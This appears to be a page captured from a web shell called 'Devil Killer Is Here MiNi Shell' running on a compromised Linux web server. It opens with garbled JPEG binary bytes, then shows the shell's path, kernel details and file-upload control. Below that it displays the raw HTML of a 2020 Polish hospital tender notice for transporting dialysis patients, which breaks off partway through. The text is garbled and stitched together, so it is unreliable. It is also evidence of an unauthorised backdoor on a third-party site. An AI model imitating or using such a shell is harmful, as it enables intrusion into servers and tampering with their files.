JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200707/556897-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 556897-N-2020 z dnia 2020-07-07 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Szpital Wojewódzki</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Realizacja usług transportowych w zakresie przewozu osób dializowanych dla Szpitala Wojewódzkiego w Bielsku-Białej</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Szpital Wojewódzki</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">70621590000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">al. Armii Krajowej</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">101</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">43-316</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Bielsko-Biała</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">338 100 143</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@hospital.com.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">338 102 101</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://www.hospital.com.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Samodzielny publiczny zakład opieki zdrowotnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://www.hospital.com.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony">Szpital Wojewódzki w Bielsku-Białej Al. Armii Krajowej 101, 43-316 Bielsko-Biała</span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Tak</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny">za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu</span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (t. j. Dz. U. z 2018r. poz. 2188 ze zm.), osobiście, za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Szpital Wojewódzki w Bielsku-Białej, Al. Armii Krajowej 101, 43-316 Bielsko-Biała (III piętro, pokój 302)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga">https://epuap.gov.pl oraz https://miniportal.uzp.gov.pl</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Realizacja usług transportowych w zakresie przewozu osób dializowanych dla Szpitala Wojewódzkiego w Bielsku-Białej</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">24/20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest realizacja usług transportowych w zakresie przewozuosób dializowanych: chodzących, poruszających się na wózkach inwalidzkich oraz wymagającychprzewozu w pozycji leżącej na noszach dla Szpitala Wojewódzkiego w Bielsku-Białej Al. ArmiiKrajowej 101, 43-316 Bielsko-Biała. 2. Wykonanie przedmiotu zamówienia nastąpi na podstawie: 1)wymagań zawartych w opisie przedmiotu zamówienia, stanowiącym Załącznik Nr 2 do Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej „siwz”; 2) postanowień zawartych we wzorze umowystanowiącym Załącznik Nr 9 do siwz. 3. Wykonanie przedmiotu zamówienia będzie się odbywać nakoszt i ryzyko Wykonawcy. 4. Wykonawca jest zobowiązany, aby wszystkie osoby wykonująceczynności przewozu osób dializowanych w okresie realizacji zamówienia, były zatrudnione napodstawie umowy o pracę oraz spełniały warunki udziału w postępowaniu określone w Sekcji III.1.3).ust. 2 pkt 3). 5. Sposób dokumentowania zatrudnienia osób, o których mowa w ust. 4 oraz uprawnieniaZamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagania dotyczącegozatrudniania tych osób na podstawie umowy o pracę i sankcji z tytułu niespełnienia tych wymagań,zostały określone we wzorze umowy</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">60130000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1. Niniejsze postępowanie prowadzone jest w trybie przetargunieograniczonego na podstawie art. 39 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t. j. Dz.U. z 2019r. poz. 1843 ze zm.), zwana dalej „ustawą pzp”. 2. Wartość szacunkowa zamówienia nieprzekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy pzp, tj. nieprzekracza wyrażonej w złotych równowartości kwoty 214 000 euro.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Określenie warunków: 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniająwarunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalnościzawodowej określone w ust. 2. 2. Określenie warunków dotyczących uprawnień do prowadzeniaokreślonej działalności zawodowej – Ocena spełniania warunków udziału w postępowaniu, zostaniedokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentówzłożonych przez Wykonawcę według formuły „spełnia – nie spełnia” w następujący sposób:Zamawiający uzna, że Wykonawca spełnia warunek dotyczący uprawnień do prowadzeniaokreślonej działalności zawodowej, jeżeli Wykonawca złoży aktualne zezwolenie lub licencję nazarobkowy przewóz osób wydane na podstawie ustawy z dnia 6 września 2001r. o transporciedrogowym (t. j. Dz. U. z 2019r. poz. 2140 ze zm.). W przypadku gdy zezwolenie lub licencja niejest wymagana - stosowne oświadczenie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Określenie warunków: 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniająwarunki udziału w postępowaniu dotyczące sytuacji ekonomicznej określone w ust. 2. 2. Określeniewarunków dotyczących sytuacji ekonomicznej - Ocena spełniania warunków udziału wpostępowaniu, zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznejoświadczeń i dokumentów złożonych przez Wykonawcę według formuły „spełnia – nie spełnia” wnastępujący sposób: Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacjiekonomicznej, jeżeli Wykonawca złoży dokumenty potwierdzające, że wykonawca jestubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej zprzedmiotem zamówienia na sumę gwarancyjną nie niższą niż 300.000,00 złotych polskich. 3.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, wstosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej innych podmiotów,niezależnie od charakteru prawnego łączących go z nim stosunków prawnych</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Określenie warunków: 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniająwarunki udziału w postępowaniu dotyczące zdolności technicznej i zawodowej określone w ust. 2 .2. Określenie warunków dotyczących zdolności technicznej i zawodowej - Ocena spełnianiawarunków udziału w postępowaniu, zostanie dokonana na podstawie analizy formalno-prawnej imerytorycznej oświadczeń i dokumentów złożonych przez Wykonawcę według formuły „spełnia –nie spełnia” w następujący sposób: 1) Zamawiający uzna, że Wykonawca spełnia warunekdotyczący doświadczenia Wykonawcy, jeżeli w okresie ostatnich 3 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykażenależyte wykonanie lub wykonywanie dwóch usług transportowych w zakresie przewozu osób doszpitalnych stacji dializ, z których każda realizowana była (w przypadku usług wykonanych) lubzrealizowana jest (w przypadku usług wykonywanych) przez okres minimum 6 miesięcy. Wzórwykazu usług stanowi Załącznik Nr 6 do siwz. 2) Zamawiający uzna, że Wykonawca spełniawarunek dotyczący potencjału technicznego Wykonawcy, jeżeli Wykonawca w wykazie pojazdówstanowiącym treść oferty – Załącznik Nr 1 do siwz „Formularz ofertowy” ust. 5 wykaże, że posiada/dysponuje przez cały okres realizacji umowy minimum siedmioma pojazdami. Pojazdybędące w posiadaniu/dysponowaniu Wykonawcy muszą spełniać warunki określone w ust. 9 opisuprzedmiotu zamówienia stanowiącym Załącznik Nr 2 do siwz. Wzór wykazu pojazdów stanowiZałącznik Nr 7 do siwz. 3) Zamawiający uzna, że Wykonawca spełnia warunek dotyczący osóbskierowanych przez Wykonawcę do realizacji zamówienia, jeżeli Wykonawca w wykazie osóbskierowanych przez Wykonawcę do realizacji zamówienia, wykaże, że dysponuje minimumsiedmioma osobami, z których każda posiada: a) wymagane prawo jazdy; b) aktualne orzeczenielekarskie dla pełnionego zawodu; c) aktualne świadectwo przeszkolenia w zakresie udzielaniapierwszej pomocy. Wzór osób stanowi Załącznik Nr 8 do siwz. 3. Wykonawca może w celupotwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz wodniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lubzawodowych lub sytuacji ekonomicznej innych podmiotów, niezależnie od charakteru prawnegołączących go z nim stosunków prawnych.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz 